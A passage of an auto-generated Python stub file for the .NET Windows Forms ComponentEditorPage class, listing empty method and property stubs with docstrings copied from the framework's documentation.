e: An System.EventArgs that contains the event data.
"""
pass
def OnBackColorChanged(self, *args): #cannot find CLR method
"""
OnBackColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBackgroundImageChanged(self, *args): #cannot find CLR method
"""
OnBackgroundImageChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackgroundImageChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBackgroundImageLayoutChanged(self, *args): #cannot find CLR method
"""
OnBackgroundImageLayoutChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackgroundImageLayoutChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBindingContextChanged(self, *args): #cannot find CLR method
"""
OnBindingContextChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BindingContextChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnCausesValidationChanged(self, *args): #cannot find CLR method
"""
OnCausesValidationChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.CausesValidationChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnChangeUICues(self, *args): #cannot find CLR method
"""
OnChangeUICues(self: Control, e: UICuesEventArgs)
Raises the System.Windows.Forms.Control.ChangeUICues event.
e: A System.Windows.Forms.UICuesEventArgs that contains the event data.
"""
pass
def OnClick(self, *args): #cannot find CLR method
"""
OnClick(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Click event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnClientSizeChanged(self, *args): #cannot find CLR method
"""
OnClientSizeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ClientSizeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnContextMenuChanged(self, *args): #cannot find CLR method
"""
OnContextMenuChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ContextMenuChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnContextMenuStripChanged(self, *args): #cannot find CLR method
"""
OnContextMenuStripChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ContextMenuStripChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnControlAdded(self, *args): #cannot find CLR method
"""
OnControlAdded(self: Control, e: ControlEventArgs)
Raises the System.Windows.Forms.Control.ControlAdded event.
e: A System.Windows.Forms.ControlEventArgs that contains the event data.
"""
pass
def OnControlRemoved(self, *args): #cannot find CLR method
"""
OnControlRemoved(self: Control, e: ControlEventArgs)
Raises the System.Windows.Forms.Control.ControlRemoved event.
e: A System.Windows.Forms.ControlEventArgs that contains the event data.
"""
pass
def OnCreateControl(self, *args): #cannot find CLR method
"""
OnCreateControl(self: Control)
Raises the System.Windows.Forms.Control.CreateControl method.
"""
pass
def OnCursorChanged(self, *args): #cannot find CLR method
"""
OnCursorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.CursorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDockChanged(self, *args): #cannot find CLR method
"""
OnDockChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.DockChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDoubleClick(self, *args): #cannot find CLR method
"""
OnDoubleClick(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.DoubleClick event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDpiChangedAfterParent(self, *args): #cannot find CLR method
""" OnDpiChangedAfterParent(self: Control, e: EventArgs) """
pass
def OnDpiChangedBeforeParent(self, *args): #cannot find CLR method
""" OnDpiChangedBeforeParent(self: Control, e: EventArgs) """
pass
def OnDragDrop(self, *args): #cannot find CLR method
"""
OnDragDrop(self: Control, drgevent: DragEventArgs)
Raises the System.Windows.Forms.Control.DragDrop event.
drgevent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnDragEnter(self, *args): #cannot find CLR method
"""
OnDragEnter(self: Control, drgevent: DragEventArgs)
Raises the System.Windows.Forms.Control.DragEnter event.
drgevent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnDragLeave(self, *args): #cannot find CLR method
"""
OnDragLeave(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.DragLeave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDragOver(self, *args): #cannot find CLR method
"""
OnDragOver(self: Control, drgevent: DragEventArgs)
Raises the System.Windows.Forms.Control.DragOver event.
drgevent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnEnabledChanged(self, *args): #cannot find CLR method
"""
OnEnabledChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.EnabledChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnEnter(self, *args): #cannot find CLR method
"""
OnEnter(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Enter event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnFontChanged(self, *args): #cannot find CLR method
"""
OnFontChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.FontChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnForeColorChanged(self, *args): #cannot find CLR method
"""
OnForeColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ForeColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnGiveFeedback(self, *args): #cannot find CLR method
"""
OnGiveFeedback(self: Control, gfbevent: GiveFeedbackEventArgs)
Raises the System.Windows.Forms.Control.GiveFeedback event.
gfbevent: A System.Windows.Forms.GiveFeedbackEventArgs that contains the event data.
"""
pass
def OnGotFocus(self, *args): #cannot find CLR method
"""
OnGotFocus(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.GotFocus event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnHandleCreated(self, *args): #cannot find CLR method
"""
OnHandleCreated(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.HandleCreated event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnHandleDestroyed(self, *args): #cannot find CLR method
"""
OnHandleDestroyed(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.HandleDestroyed event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnHelpRequested(self, *args): #cannot find CLR method
"""
OnHelpRequested(self: Control, hevent: HelpEventArgs)
Raises the System.Windows.Forms.Control.HelpRequested event.
hevent: A System.Windows.Forms.HelpEventArgs that contains the event data.
"""
pass
def OnImeModeChanged(self, *args): #cannot find CLR method
"""
OnImeModeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ImeModeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnInvalidated(self, *args): #cannot find CLR method
"""
OnInvalidated(self: Control, e: InvalidateEventArgs)
Raises the System.Windows.Forms.Control.Invalidated event.
e: An System.Windows.Forms.InvalidateEventArgs that contains the event data.
"""
pass
def OnKeyDown(self, *args): #cannot find CLR method
"""
OnKeyDown(self: Control, e: KeyEventArgs)
Raises the System.Windows.Forms.Control.KeyDown event.
e: A System.Windows.Forms.KeyEventArgs that contains the event data.
"""
pass
def OnKeyPress(self, *args): #cannot find CLR method
"""
OnKeyPress(self: Control, e: KeyPressEventArgs)
Raises the System.Windows.Forms.Control.KeyPress event.
e: A System.Windows.Forms.KeyPressEventArgs that contains the event data.
"""
pass
def OnKeyUp(self, *args): #cannot find CLR method
"""
OnKeyUp(self: Control, e: KeyEventArgs)
Raises the System.Windows.Forms.Control.KeyUp event.
e: A System.Windows.Forms.KeyEventArgs that contains the event data.
"""
pass
def OnLayout(self, *args): #cannot find CLR method
"""
OnLayout(self: ScrollableControl, levent: LayoutEventArgs)
levent: A System.Windows.Forms.LayoutEventArgs that contains the event data.
"""
pass
def OnLeave(self, *args): #cannot find CLR method
"""
OnLeave(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Leave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnLocationChanged(self, *args): #cannot find CLR method
"""
OnLocationChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.LocationChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnLostFocus(self, *args): #cannot find CLR method
"""
OnLostFocus(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.LostFocus event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMarginChanged(self, *args): #cannot find CLR method
"""
OnMarginChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MarginChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnMouseCaptureChanged(self, *args): #cannot find CLR method
"""
OnMouseCaptureChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseCaptureChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseClick(self, *args): #cannot find CLR method
"""
OnMouseClick(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseClick event.
e: An System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseDoubleClick(self, *args): #cannot find CLR method
"""
OnMouseDoubleClick(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseDoubleClick event.
e: An System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseDown(self, *args): #cannot find CLR method
"""
OnMouseDown(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseDown event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseEnter(self, *args): #cannot find CLR method
"""
OnMouseEnter(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseEnter event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseHover(self, *args): #cannot find CLR method
"""
OnMouseHover(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseHover event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseLeave(self, *args): #cannot find CLR method
"""
OnMouseLeave(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseLeave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseMove(self, *args): #cannot find CLR method
"""
OnMouseMove(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseMove event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseUp(self, *args): #cannot find CLR method
"""
OnMouseUp(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseUp event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseWheel(self, *args): #cannot find CLR method
"""
OnMouseWheel(self: ScrollableControl, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseWheel event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMove(self, *args): #cannot find CLR method
"""
OnMove(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Move event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnNotifyMessage(self, *args): #cannot find CLR method
"""
OnNotifyMessage(self: Control, m: Message)
Notifies the control of Windows messages.
m: A System.Windows.Forms.Message that represents the Windows message.
"""
pass
def OnPaddingChanged(self, *args): #cannot find CLR method
"""
OnPaddingChanged(self: ScrollableControl, e: EventArgs)
Raises the System.Windows.Forms.Control.PaddingChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnPaint(self, *args): #cannot find CLR method
"""
OnPaint(self: Control, e: PaintEventArgs)
Raises the System.Windows.Forms.Control.Paint event.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnPaintBackground(self, *args): #cannot find CLR method
"""
OnPaintBackground(self: ScrollableControl, e: PaintEventArgs)
Paints the background of the control.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnParentBackColorChanged(self, *args): #cannot find CLR method
"""
OnParentBackColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackColorChanged event when the
System.Windows.Forms.Control.BackColor property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentBackgroundImageChanged(self, *args): #cannot find CLR method
"""
OnParentBackgroundImageChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackgroundImageChanged event when the
System.Windows.Forms.Control.BackgroundImage property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentBindingContextChanged(self, *args): #cannot find CLR method
"""
OnParentBindingContextChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BindingContextChanged event when the
System.Windows.Forms.Control.BindingContext property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentChanged(self, *args): #cannot find CLR method
"""
OnParentChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ParentChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentCursorChanged(self, *args): #cannot find CLR method
"""
OnParentCursorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.CursorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentEnabledChanged(self, *args): #cannot find CLR method
"""
OnParentEnabledChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.EnabledChanged event when the
System.Windows.Forms.Control.Enabled property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentFontChanged(self, *args): #cannot find CLR method
"""
OnParentFontChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.FontChanged event when the
System.Windows.Forms.Control.Font property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentForeColorChanged(self, *args): #cannot find CLR method
"""
OnParentForeColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ForeColorChanged event when the
System.Windows.Forms.Control.ForeColor property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentRightToLeftChanged(self, *args): #cannot find CLR method
"""
OnParentRightToLeftChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.RightToLeftChanged event when the
System.Windows.Forms.Control.RightToLeft property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentVisibleChanged(self, *args): #cannot find CLR method
"""
OnParentVisibleChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.VisibleChanged event when the
System.Windows.Forms.Control.Visible property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnPreviewKeyDown(self, *args): #cannot find CLR method
"""
OnPreviewKeyDown(self: Control, e: PreviewKeyDownEventArgs)
Raises the System.Windows.Forms.Control.PreviewKeyDown event.
e: A System.Windows.Forms.PreviewKeyDownEventArgs that contains the event data.
"""
pass
def OnPrint(self, *args): #cannot find CLR method
"""
OnPrint(self: Control, e: PaintEventArgs)
Raises the System.Windows.Forms.Control.Paint event.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnQueryContinueDrag(self, *args): #cannot find CLR method
"""
OnQueryContinueDrag(self: Control, qcdevent: QueryContinueDragEventArgs)
Raises the System.Windows.Forms.Control.QueryContinueDrag event.
qcdevent: A System.Windows.Forms.QueryContinueDragEventArgs that contains the event data.
"""
pass
def OnRegionChanged(self, *args): #cannot find CLR method
"""
OnRegionChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.RegionChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnResize(self, *args): #cannot find CLR method
"""
OnResize(self: Panel, eventargs: EventArgs)
Fires the event indicating that the panel has been resized. Inheriting controls should use this
in favor of actually listening to the event, but should still call base.onResize to ensure that
the event is fired for external listeners.
eventargs: An System.EventArgs that contains the event data.
"""
pass
def OnRightToLeftChanged(self, *args): #cannot find CLR method
"""
OnRightToLeftChanged(self: ScrollableControl, e: EventArgs)
e: An System.EventArgs that contains the event data.
"""
pass
def OnScroll(self, *args): #cannot find CLR method
"""
OnScroll(self: ScrollableControl, se: ScrollEventArgs)
Raises the System.Windows.Forms.ScrollableControl.Scroll event.
se: A System.Windows.Forms.ScrollEventArgs that contains the event data.
"""
pass
def OnSizeChanged(self, *args): #cannot find CLR method
"""
OnSizeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.SizeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnStyleChanged(self, *args): #cannot find CLR method
"""
OnStyleChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.StyleChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnSystemColorsChanged(self, *args): #cannot find CLR method
"""
OnSystemColorsChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.SystemColorsChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnTabIndexChanged(self, *args): #cannot find CLR method
"""
OnTabIndexChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.TabIndexChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnTabStopChanged(self, *args): #cannot find CLR method
"""
OnTabStopChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.TabStopChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnTextChanged(self, *args): #cannot find CLR method
"""
OnTextChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.TextChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnValidated(self, *args): #cannot find CLR method
"""
OnValidated(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Validated event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnValidating(self, *args): #cannot find CLR method
"""
OnValidating(self: Control, e: CancelEventArgs)
Raises the System.Windows.Forms.Control.Validating event.
e: A System.ComponentModel.CancelEventArgs that contains the event data.
"""
pass
def OnVisibleChanged(self, *args): #cannot find CLR method
"""
OnVisibleChanged(self: ScrollableControl, e: EventArgs)
e: An System.EventArgs that contains the event data.
"""
pass
def ProcessCmdKey(self, *args): #cannot find CLR method
"""
ProcessCmdKey(self: Control, msg: Message, keyData: Keys) -> (bool, Message)
Processes a command key.
msg: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
keyData: One of the System.Windows.Forms.Keys values that represents the key to process.
Returns: true if the character was processed by the control; otherwise, false.
"""
pass
def ProcessDialogChar(self, *args): #cannot find CLR method
"""
ProcessDialogChar(self: Control, charCode: Char) -> bool
Processes a dialog character.
charCode: The character to process.
Returns: true if the character was processed by the control; otherwise, false.
"""
pass
def ProcessDialogKey(self, *args): #cannot find CLR method
"""
ProcessDialogKey(self: Control, keyData: Keys) -> bool
Processes a dialog key.
keyData: One of the System.Windows.Forms.Keys values that represents the key to process.
Returns: true if the key was processed by the control; otherwise, false.
"""
pass
def ProcessKeyEventArgs(self, *args): #cannot find CLR method
"""
ProcessKeyEventArgs(self: Control, m: Message) -> (bool, Message)
Processes a key message and generates the appropriate control events.
m: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
Returns: true if the message was processed by the control; otherwise, false.
"""
pass
def ProcessKeyMessage(self, *args): #cannot find CLR method
"""
ProcessKeyMessage(self: Control, m: Message) -> (bool, Message)
Processes a keyboard message.
m: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
Returns: true if the message was processed by the control; otherwise, false.
"""
pass
def ProcessKeyPreview(self, *args): #cannot find CLR method
"""
ProcessKeyPreview(self: Control, m: Message) -> (bool, Message)
Previews a keyboard message.
m: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
Returns: true if the message was processed by the control; otherwise, false.
"""
pass
def ProcessMnemonic(self, *args): #cannot find CLR method
"""
ProcessMnemonic(self: Control, charCode: Char) -> bool
Processes a mnemonic character.
charCode: The character to process.
Returns: true if the character was processed as a mnemonic by the control; otherwise, false.
"""
pass
def RaiseDragEvent(self, *args): #cannot find CLR method
"""
RaiseDragEvent(self: Control, key: object, e: DragEventArgs)
Raises the appropriate drag event.
key: The event to raise.
e: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def RaiseKeyEvent(self, *args): #cannot find CLR method
"""
RaiseKeyEvent(self: Control, key: object, e: KeyEventArgs)
Raises the appropriate key event.
key: The event to raise.
e: A System.Windows.Forms.KeyEventArgs that contains the event data.
"""
pass
def RaiseMouseEvent(self, *args): #cannot find CLR method
"""
RaiseMouseEvent(self: Control, key: object, e: MouseEventArgs)
Raises the appropriate mouse event.
key: The event to raise.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def RaisePaintEvent(self, *args): #cannot find CLR method
"""
RaisePaintEvent(self: Control, key: object, e: PaintEventArgs)
Raises the appropriate paint event.
key: The event to raise.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def RecreateHandle(self, *args): #cannot find CLR method
"""
RecreateHandle(self: Control)
Forces the re-creation of the handle for the control.
"""
pass
def ReloadComponent(self, *args): #cannot find CLR method
"""
ReloadComponent(self: ComponentEditorPage)
Reloads the component for the page.
"""
pass
def RescaleConstantsForDpi(self, *args): #cannot find CLR method
""" RescaleConstantsForDpi(self: Control, deviceDpiOld: int, deviceDpiNew: int) """
pass
def ResetMouseEventArgs(self, *args): #cannot find CLR method
"""
ResetMouseEventArgs(self: Control)
Resets the control to handle the System.Windows.Forms.Control.MouseLeave event.
"""
pass
def RtlTranslateAlignment(self, *args): #cannot find CLR method
"""
RtlTranslateAlignment(self: Control, align: ContentAlignment) -> ContentAlignment
Converts the specified System.Drawing.ContentAlignment to the appropriate
System.Drawing.ContentAlignment to support right-to-left text.
align: One of the System.Drawing.ContentAlignment values.
Returns: One of the System.Drawing.ContentAlignment values.
RtlTranslateAlignment(self: Control, align: LeftRightAlignment) -> LeftRightAlignment
Converts the specified System.Windows.Forms.LeftRightAlignment to the appropriate
System.Windows.Forms.LeftRightAlignment to support right-to-left text.
align: One of the System.Windows.Forms.LeftRightAlignment values.
Returns: One of the System.Windows.Forms.LeftRightAlignment values.
RtlTranslateAlignment(self: Control, align: HorizontalAlignment) -> HorizontalAlignment
Converts the specified System.Windows.Forms.HorizontalAlignment to the appropriate
System.Windows.Forms.HorizontalAlignment to support right-to-left text.
align: One of the System.Windows.Forms.HorizontalAlignment values.
Returns: One of the System.Windows.Forms.HorizontalAlignment values.
"""
pass
def RtlTranslateContent(self, *args): #cannot find CLR method
"""
RtlTranslateContent(self: Control, align: ContentAlignment) -> ContentAlignment
Converts the specified System.Drawing.ContentAlignment to the appropriate
System.Drawing.ContentAlignment to support right-to-left text.
align: One of the System.Drawing.ContentAlignment values.
Returns: One of the System.Drawing.ContentAlignment values.
"""
pass
def RtlTranslateHorizontal(self, *args): #cannot find CLR method
"""
RtlTranslateHorizontal(self: Control, align: HorizontalAlignment) -> HorizontalAlignment
Converts the specified System.Windows.Forms.HorizontalAlignment to the appropriate
System.Windows.Forms.HorizontalAlignment to support right-to-left text.
align: One of the System.Windows.Forms.HorizontalAlignment values.
Returns: One of the System.Windows.Forms.HorizontalAlignment values.
"""
pass
def RtlTranslateLeftRight(self, *args): #cannot find CLR method
"""
RtlTranslateLeftRight(self: Control, align: LeftRightAlignment) -> LeftRightAlignment
Converts the specified System.Windows.Forms.LeftRightAlignment to the appropriate
System.Windows.Forms.LeftRightAlignment to support right-to-left text.
align: One of the System.Windows.Forms.LeftRightAlignment values.
Returns: One of the System.Windows.Forms.LeftRightAlignment values.
"""
pass
def SaveComponent(self, *args): #cannot find CLR method
"""
SaveComponent(self: ComponentEditorPage)
Saves the component from the page user interface (UI).
"""
pass
def ScaleControl(self, *args): #cannot find CLR method
"""
ScaleControl(self: ScrollableControl, factor: SizeF, specified: BoundsSpecified)
factor: The factor by which the height and width of the control will be scaled.
specified: A System.Windows.Forms.BoundsSpecified value that specifies the bounds of the control to use
when defining its size and position.
"""
pass
def ScaleCore(self, *args): #cannot find CLR method
"""
ScaleCore(self: ScrollableControl, dx: Single, dy: Single)
dx: The horizontal scaling factor.
dy: The vertical scaling factor.
"""
pass
def ScrollToControl(self, *args): #cannot find CLR method
"""
ScrollToControl(self: ScrollableControl, activeControl: Control) -> Point
Calculates the scroll offset to the specified child control.
activeControl: The child control to scroll into view.
Returns: The upper-left hand System.Drawing.Point of the display area relative to the client area
required to scroll the control into view.
"""
pass
def Select(self):
"""
Select(self: Control, directed: bool, forward: bool)
Activates a child control. Optionally specifies the direction in the tab order to select the
control from.
directed: true to specify the direction of the control to select; otherwise, false.
forward: true to move forward in the tab order; false to move backward in the tab order.
"""
pass
def SetAutoSizeMode(self, *args): #cannot find CLR method
"""
SetAutoSizeMode(self: Control, mode: AutoSizeMode)
Sets a value indicating how a control will behave when its System.Windows.Forms.Control.AutoSize
property is enabled.
mode: One of the System.Windows.Forms.AutoSizeMode values.
"""
pass
def SetBoundsCore(self, *args): #cannot find CLR method
"""
SetBoundsCore(self: Control, x: int, y: int, width: int, height: int, specified: BoundsSpecified)
Performs the work of setting the specified bounds of this control.
x: The new System.Windows.Forms.Control.Left property value of the control.
y: The new System.Windows.Forms.Control.Top property value of the control.
width: The new System.Windows.Forms.Control.Width property value of the control.
height: The new System.Windows.Forms.Control.Height property value of the control.
specified: A bitwise combination of the System.Windows.Forms.BoundsSpecified values.
"""
pass
def SetClientSizeCore(self, *args): #cannot find CLR method
"""
SetClientSizeCore(self: Control, x: int, y: int)
Sets the size of the client area of the control.
x: The client area width, in pixels.
y: The client area height, in pixels.
"""
pass
def SetComponent(self, component):
"""
SetComponent(self: ComponentEditorPage, component: IComponent)
Sets the component to be edited.
component: The System.ComponentModel.IComponent to be edited.
"""
pass
def SetDirty(self, *args): #cannot find CLR method
"""
SetDirty(self: ComponentEditorPage)
Sets the page as changed since the last load or save.
"""
pass
def SetDisplayRectLocation(self, *args): #cannot find CLR method
"""
SetDisplayRectLocation(self: ScrollableControl, x: int, y: int)
Positions the display window to the specified value.
x: The horizontal offset at which to position the System.Windows.Forms.ScrollableControl.
y: The vertical offset at which to position the System.Windows.Forms.ScrollableControl.
"""
pass
def SetScrollState(self, *args): #cannot find CLR method
"""
SetScrollState(self: ScrollableControl, bit: int, value: bool)
Sets the specified scroll state flag.
bit: The scroll state flag to set.
value: The value to set the flag.
"""
pass
def SetSite(self, site):
"""
SetSite(self: ComponentEditorPage, site: IComponentEditorPageSite)
Sets the site for this page.
site: The site for this page.
"""
pass
def SetStyle(self, *args): #cannot find CLR method
"""
SetStyle(self: Control, flag: ControlStyles, value: bool)
Sets a specified System.Windows.Forms.ControlStyles flag to either true or false.
flag: The System.Windows.Forms.ControlStyles bit to set.
value: true to apply the specified style to the control; otherwise, false.
"""
pass
def SetTopLevel(self, *args): #cannot find CLR method
"""
SetTopLevel(self: Control, value: bool)
Sets the control as the top-level control.
value: true to set the control as the top-level control; otherwise, false.
"""
pass
def SetVisibleCore(self, *args): #cannot find CLR method
"""
SetVisibleCore(self: Control, value: bool)
Sets the control to the specified visible state.
value: true to make the control visible; otherwise, false.
"""
pass
def ShowHelp(self):
"""
ShowHelp(self: ComponentEditorPage)
Shows Help information if the page supports Help information.
"""
pass
def SizeFromClientSize(self, *args): #cannot find CLR method
"""
SizeFromClientSize(self: Control, clientSize: Size) -> Size
Determines the size of the entire control from the height and width of its client area.
clientSize: A System.Drawing.Size value representing the height and width of the control's client area.
Returns: A System.Drawing.Size value representing the height and width of the entire control.
"""
pass
def SupportsHelp(self):
"""
SupportsHelp(self: ComponentEditorPage) -> bool
Gets a value indicating whether the editor supports Help.
Returns: true if the editor supports Help; otherwise, false. The default implementation returns false.
"""
pass
def UpdateBounds(self, *args): #cannot find CLR method
"""
UpdateBounds(self: Control, x: int, y: int, width: int, height: int, clientWidth: int, clientHeight: int)
Updates the bounds of the control with the specified size, location, and client size.
x: The System.Drawing.Point.X coordinate of the control.
y: The System.Drawing.Point.Y coordinate of the control.
width: The System.Drawing.Size.Width of the control.
height: The System.Drawing.Size.Height of the control.
clientWidth: The client System.Drawing.Size.Width of the control.
clientHeight: The client System.Drawing.Size.Height of the control.
UpdateBounds(self: Control, x: int, y: int, width: int, height: int)
Updates the bounds of the control with the specified size and location.
x: The System.Drawing.Point.X coordinate of the control.
y: The System.Drawing.Point.Y coordinate of the control.
width: The System.Drawing.Size.Width of the control.
height: The System.Drawing.Size.Height of the control.
UpdateBounds(self: Control)
Updates the bounds of the control with the current size and location.
"""
pass
def UpdateStyles(self, *args): #cannot find CLR method
"""
UpdateStyles(self: Control)
Forces the assigned styles to be reapplied to the control.
"""
pass
def UpdateZOrder(self, *args): #cannot find CLR method
"""
UpdateZOrder(self: Control)
Updates the control in its parent's z-order.
"""
pass
def WndProc(self, *args): #cannot find CLR method
"""
WndProc(self: ScrollableControl, m: Message) -> Message
m: The Windows System.Windows.Forms.Message to process.
"""
pass
def __enter__(self, *args): #cannot find CLR method
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self, *args): #cannot find CLR method
"""
__exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __str__(self, *args): #cannot find CLR method
pass
AutoSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""This property is not relevant for this class.
Get: AutoSize(self: ComponentEditorPage) -> bool
Set: AutoSize(self: ComponentEditorPage) = value
"""
CanEnableIme = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the System.Windows.Forms.Control.ImeMode property can be set to an active value, to enable IME support.
"""
CanRaiseEvents = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Determines if events can be raised on the control.
"""
CommitOnDeactivate = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
